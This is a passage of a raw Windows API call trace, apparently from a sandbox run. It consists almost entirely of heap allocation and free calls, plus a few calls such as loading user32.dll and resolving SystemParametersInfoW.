| out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0251.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0251.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0251.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0251.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0251.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0251.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0251.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0251.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0251.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0251.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0251.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0251.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0251.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0251.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0251.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0251.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0251.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0251.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0251.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0251.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0251.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0251.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0251.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0251.145] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0251.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0251.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0251.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0251.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0251.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0251.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0251.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0251.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0251.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0251.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0251.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0251.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0251.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0251.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0251.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0251.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0251.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0251.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0251.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0251.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0251.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0251.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0251.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0251.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0251.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0251.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0251.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0251.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0251.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0251.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0251.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0251.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0251.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0251.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0251.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0251.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0251.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0251.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0251.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0251.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0251.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0251.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0251.150] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0251.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0251.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0251.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0251.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6fa0 [0251.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6fa0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0251.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0251.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0251.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0251.151] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0251.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0251.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0251.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0251.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0251.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0251.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0251.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0251.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0251.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0251.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0251.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0251.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0251.151] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0251.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865040 [0251.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0251.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0251.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0251.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0251.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0251.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0251.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0251.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0251.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0251.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0251.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0251.251] RtlAllocateHeap (HeapHandle=0x2af0000, 